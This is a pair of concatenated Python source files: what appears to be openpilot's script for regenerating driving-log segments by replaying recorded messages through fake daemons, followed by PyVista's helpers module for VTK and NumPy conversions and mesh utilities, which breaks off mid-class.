process_replay_dir = os.path.dirname(os.path.abspath(__file__))
FAKEDATA = os.path.join(process_replay_dir, "fakedata/")
def replay_panda_states(s, msgs):
pm = messaging.PubMaster([s, 'peripheralState'])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() in ['pandaStates', 'pandaStateDEPRECATED']]
# Migrate safety param base on carState
cp = [m for m in msgs if m.which() == 'carParams'][0].carParams
if len(cp.safetyConfigs):
safety_param = cp.safetyConfigs[0].safetyParam
if cp.safetyConfigs[0].safetyParamDEPRECATED != 0:
safety_param = cp.safetyConfigs[0].safetyParamDEPRECATED
else:
safety_param = cp.safetyParamDEPRECATED
while True:
for m in smsgs:
if m.which() == 'pandaStateDEPRECATED':
new_m = messaging.new_message('pandaStates', 1)
new_m.pandaStates[0] = m.pandaStateDEPRECATED
new_m.pandaStates[0].safetyParam = safety_param
pm.send(s, new_m)
else:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
pm.send(s, new_m)
new_m = messaging.new_message('peripheralState')
pm.send('peripheralState', new_m)
rk.keep_time()
def replay_manager_state(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
while True:
new_m = messaging.new_message('managerState')
new_m.managerState.processes = [{'name': name, 'running': True} for name in managed_processes]
pm.send(s, new_m)
rk.keep_time()
def replay_device_state(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
new_m.deviceState.freeSpacePercent = 50
new_m.deviceState.memoryUsagePercent = 50
pm.send(s, new_m)
rk.keep_time()
def replay_sensor_events(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
for evt in new_m.sensorEvents:
evt.timestamp = new_m.logMonoTime
pm.send(s, new_m)
rk.keep_time()
def replay_service(s, msgs):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(service_list[s].frequency, print_delay_threshold=None)
smsgs = [m for m in msgs if m.which() == s]
while True:
for m in smsgs:
new_m = m.as_builder()
new_m.logMonoTime = int(sec_since_boot() * 1e9)
pm.send(s, new_m)
rk.keep_time()
def replay_cameras(lr, frs):
eon_cameras = [
("roadCameraState", DT_MDL, eon_f_frame_size, VisionStreamType.VISION_STREAM_ROAD, True),
("driverCameraState", DT_DMON, eon_d_frame_size, VisionStreamType.VISION_STREAM_DRIVER, False),
]
tici_cameras = [
("roadCameraState", DT_MDL, tici_f_frame_size, VisionStreamType.VISION_STREAM_ROAD, True),
("driverCameraState", DT_MDL, tici_d_frame_size, VisionStreamType.VISION_STREAM_DRIVER, False),
]
def replay_camera(s, stream, dt, vipc_server, frames, size, use_extra_client):
pm = messaging.PubMaster([s, ])
rk = Ratekeeper(1 / dt, print_delay_threshold=None)
img = b"\x00" * int(size[0] * size[1] * 3 / 2)
while True:
if frames is not None:
img = frames[rk.frame % len(frames)]
rk.keep_time()
m = messaging.new_message(s)
msg = getattr(m, s)
msg.frameId = rk.frame
msg.timestampSof = m.logMonoTime
msg.timestampEof = m.logMonoTime
pm.send(s, m)
vipc_server.send(stream, img, msg.frameId, msg.timestampSof, msg.timestampEof)
if use_extra_client:
vipc_server.send(VisionStreamType.VISION_STREAM_WIDE_ROAD, img, msg.frameId, msg.timestampSof, msg.timestampEof)
init_data = [m for m in lr if m.which() == 'initData'][0]
cameras = tici_cameras if (init_data.initData.deviceType == 'tici') else eon_cameras
# init vipc server and cameras
p = []
vs = VisionIpcServer("camerad")
for (s, dt, size, stream, use_extra_client) in cameras:
fr = frs.get(s, None)
frames = None
if fr is not None:
print(f"Decompressing frames {s}")
frames = []
for i in tqdm(range(fr.frame_count)):
img = fr.get(i, pix_fmt='yuv420p')[0]
frames.append(img.flatten().tobytes())
vs.create_buffers(stream, 40, False, size[0], size[1])
if use_extra_client:
vs.create_buffers(VisionStreamType.VISION_STREAM_WIDE_ROAD, 40, False, size[0], size[1])
p.append(multiprocessing.Process(target=replay_camera,
args=(s, stream, dt, vs, frames, size, use_extra_client)))
# hack to make UI work
vs.create_buffers(VisionStreamType.VISION_STREAM_RGB_ROAD, 4, True, eon_f_frame_size[0], eon_f_frame_size[1])
vs.start_listener()
return vs, p
def regen_segment(lr, frs=None, outdir=FAKEDATA):
lr = list(lr)
if frs is None:
frs = dict()
setup_env()
params = Params()
os.environ["LOG_ROOT"] = outdir
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
# TODO: remove after getting new route for mazda
migration = {
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
params.put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
elif msg.which() == 'liveCalibration':
params.put("CalibrationParams", msg.as_builder().to_bytes())
vs, cam_procs = replay_cameras(lr, frs)
fake_daemons = {
'sensord': [
multiprocessing.Process(target=replay_sensor_events, args=('sensorEvents', lr)),
],
'pandad': [
multiprocessing.Process(target=replay_service, args=('can', lr)),
multiprocessing.Process(target=replay_service, args=('ubloxRaw', lr)),
multiprocessing.Process(target=replay_panda_states, args=('pandaStates', lr)),
],
'managerState': [
multiprocessing.Process(target=replay_manager_state, args=('managerState', lr)),
],
'thermald': [
multiprocessing.Process(target=replay_device_state, args=('deviceState', lr)),
],
'camerad': [
*cam_procs,
],
}
try:
# TODO: make first run of onnxruntime CUDA provider fast
managed_processes["modeld"].start()
managed_processes["dmonitoringmodeld"].start()
time.sleep(5)
# start procs up
ignore = list(fake_daemons.keys()) + ['ui', 'manage_athenad', 'uploader']
ensure_running(managed_processes.values(), started=True, not_run=ignore)
for procs in fake_daemons.values():
for p in procs:
p.start()
for _ in tqdm(range(60)):
# ensure all procs are running
for d, procs in fake_daemons.items():
for p in procs:
if not p.is_alive():
raise Exception(f"{d}'s {p.name} died")
time.sleep(1)
finally:
# kill everything
for p in managed_processes.values():
p.stop()
for procs in fake_daemons.values():
for p in procs:
p.terminate()
del vs
segment = params.get("CurrentRoute", encoding='utf-8') + "--0"
seg_path = os.path.join(outdir, segment)
# check to make sure openpilot is engaged in the route
if not check_enabled(LogReader(os.path.join(seg_path, "rlog.bz2"))):
raise Exception(f"Route never enabled: {segment}")
return seg_path
def regen_and_save(route, sidx, upload=False, use_route_meta=False):
if use_route_meta:
r = Route(args.route)
lr = LogReader(r.log_paths()[args.seg])
fr = FrameReader(r.camera_paths()[args.seg])
else:
lr = LogReader(f"cd:/{route.replace('|', '/')}/{sidx}/rlog.bz2")
fr = FrameReader(f"cd:/{route.replace('|', '/')}/{sidx}/fcamera.hevc")
rpath = regen_segment(lr, {'roadCameraState': fr})
lr = LogReader(os.path.join(rpath, 'rlog.bz2'))
controls_state_active = [m.controlsState.active for m in lr if m.which() == 'controlsState']
assert any(controls_state_active), "Segment did not engage"
relr = os.path.relpath(rpath)
print("\n\n", "*"*30, "\n\n")
print("New route:", relr, "\n")
if upload:
upload_route(relr)
return relr
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Generate new segments from old ones")
parser.add_argument("--upload", action="store_true", help="Upload the new segment to the CI bucket")
parser.add_argument("route", type=str, help="The source route")
parser.add_argument("seg", type=int, help="Segment in source route")
args = parser.parse_args()
regen_and_save(args.route, args.seg, args.upload)
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import os
import collections.abc
import enum
import logging
import signal
import sys
from threading import Thread
import threading
import traceback
import numpy as np
from pyvista import _vtk
import pyvista
from .fileio import from_meshio
from . import transformations
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = _vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = _vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = _vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = _vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a give python data type.
Corrects for string type mapping issues.
Returns
-------
int : the integer type id specified in vtkType.h
"""
typ = _vtk.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array."""
vtkarr = _vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array."""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Note that this is terribly inefficient - inefficient support
is better than no support :). If you have ideas on how to make this faster,
please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = _vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=0, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
-----------
arr : ndarray or vtkDataArry
A numpy array or vtkDataArry to convert
name : str
The name of the data array for VTK
deep : bool
if input is numpy array then deep copy values
Returns
-------
vtkDataArray, ndarray, or DataFrame:
the converted array (if input is a NumPy ndaray then returns
``vtkDataArray`` or is input is ``vtkDataArray`` then returns NumPy
``ndarray``). If pdf==True and the input is ``vtkDataArry``,
return a pandas DataFrame.
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = _vtk.numpy_to_vtk(num_array=arr, deep=deep,
array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (_vtk.vtkDataArray, _vtk.vtkBitArray, _vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, _vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, _vtk.vtkStringArray):
return convert_string_array(arr)
# Convert from vtkDataArry to NumPy
return _vtk.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return True if the Object is a PyVista wrapped dataset."""
return isinstance(obj, (pyvista.DataSet, pyvista.MultiBlock))
def point_array(mesh, name):
"""Return point array of a vtk object."""
vtkarr = mesh.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(mesh, name):
"""Return field array of a vtk object."""
vtkarr = mesh.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(mesh, name):
"""Return cell array of a vtk object."""
vtkarr = mesh.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(data_object, name):
"""Return row array of a vtk object."""
vtkarr = data_object.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return the id of the given field."""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r']:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', info=False, err=False):
"""Search point, cell and field data for an array.
Parameters
----------
name : str
The name of the array to get the range.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``
info : bool
Return info about the array rather than the array itself.
err : bool
Boolean to control whether to throw an error if array is not present.
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
field = FieldAssociation.ROW
if info:
return arr, field
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
if preference == FieldAssociation.CELL:
if info:
return carr, FieldAssociation.CELL
else:
return carr
elif preference == FieldAssociation.POINT:
if info:
return parr, FieldAssociation.POINT
else:
return parr
elif preference == FieldAssociation.NONE:
if info:
return farr, FieldAssociation.NONE
else:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
arr = None
field = None
if parr is not None:
arr = parr
field = FieldAssociation.POINT
elif carr is not None:
arr = carr
field = FieldAssociation.CELL
elif farr is not None:
arr = farr
field = FieldAssociation.NONE
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
if info:
return arr, field
return arr
def vtk_points(points, deep=True):
"""Convert numpy array or array-like to a vtkPoints object."""
points = np.asanyarray(points)
# verify is numeric
if not np.issubdtype(points.dtype, np.number):
raise TypeError('Points must be a numeric type')
# check dimensionality
if points.ndim == 1:
points = points.reshape(-1, 3)
elif points.ndim > 2:
raise ValueError('Dimension of ``points`` should be 1 or 2, not '
f'{points.ndim}')
# verify shape
if points.shape[1] != 3:
raise ValueError('Points array must contain three values per point. '
f'Shape is {points.shape} and should be (X, 3)')
# points must be contiguous
points = np.require(points, requirements=['C'])
vtkpts = _vtk.vtkPoints()
vtk_arr = _vtk.numpy_to_vtk(points, deep=deep)
vtkpts.SetData(vtk_arr)
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of
points.
Parameters
----------
points : np.ndarray
Points representing line segments. An even number must be
given as every two vertices represent a single line
segment. For example, two line segments would be represented
as:
``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> lines = pyvista.lines_from_points(points)
>>> cpos = lines.plot()
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected segments. For
example, two line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
close : bool, optional
If True, close the line segments into a loop
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0]], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape (N, 3) storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape ``(M, 3)`` containing the triangle
indices.
Returns
-------
tri_mesh : pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista as pv
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
>>> tri_mesh = pyvista.make_tri_mesh(points, faces)
>>> cpos = tri_mesh.plot(show_edges=True)
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a vtkPolyData object composed of vectors."""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = _vtk.vtkPoints()
vpts.SetData(_vtk.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = _vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to a ``numpy.ndarray``.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
"""
if isinstance(matrix, _vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, _vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = _vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = _vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(mesh):
"""Test if passed object is instance of ``meshio.Mesh``."""
try:
import meshio
return isinstance(mesh, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate pyvista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
* 3D :class:`meshio` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
wrapped_dataset : pyvista class
The `pyvista` wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object.
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object.
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
# Return if None
if dataset is None:
return
# Check if dataset is a numpy array. We do this first since
# pyvista_ndarray contains a VTK type that we don't want to
# directly wrap.
if isinstance(dataset, (np.ndarray, pyvista.pyvista_ndarray)):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
raise NotImplementedError('NumPy array could not be wrapped pyvista.')
wrappers = {
'vtkExplicitStructuredGrid': pyvista.ExplicitStructuredGrid,
'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
'vtkRectilinearGrid': pyvista.RectilinearGrid,
'vtkStructuredGrid': pyvista.StructuredGrid,
'vtkPolyData': pyvista.PolyData,
'vtkImageData': pyvista.UniformGrid,
'vtkStructuredPoints': pyvista.UniformGrid,
'vtkMultiBlockDataSet': pyvista.MultiBlock,
'vtkTable': pyvista.Table,
# 'vtkParametricSpline': pyvista.Spline,
}
# Check if a dataset is a VTK type
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
try:
return wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return
# wrap meshio
if is_meshio_mesh(dataset):
return from_meshio(dataset)
# wrap trimesh
if dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
# otherwise, flag tell the user we can't wrap this object
raise NotImplementedError(f'Unable to wrap ({type(dataset)}) into a pyvista type.')
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``."""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture."""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points.
Parameters
----------
points : np.ndarray
Size n by 3 array of points to fit a plane through
return_meta : bool
If true, also returns the center and normal used to generate the plane
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, mesh):
"""Raise exception about inconsistencies."""
if isinstance(mesh, _vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({mesh.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) '
f'must match either the number of points ({mesh.n_points}) '
f'or the number of cells ({mesh.n_cells}).')
def generate_plane(normal, origin):
"""Return a _vtk.vtkPlane."""
plane = _vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement."""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
return
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the
current environment. Returns ``True`` if depth peeling is
available and has been successfully leveraged, otherwise
``False``.
"""
# Try Depth Peeling with a basic scene
source = _vtk.vtkSphereSource()
mapper = _vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = _vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = _vtk.vtkRenderer()
renderWindow = _vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods."""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
This must be use in a ``with`` context and it will block keyboard
interrupts from happening until the exit event as interrupts will crash
the kernel if the VTK algorithm is still executing.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = _vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
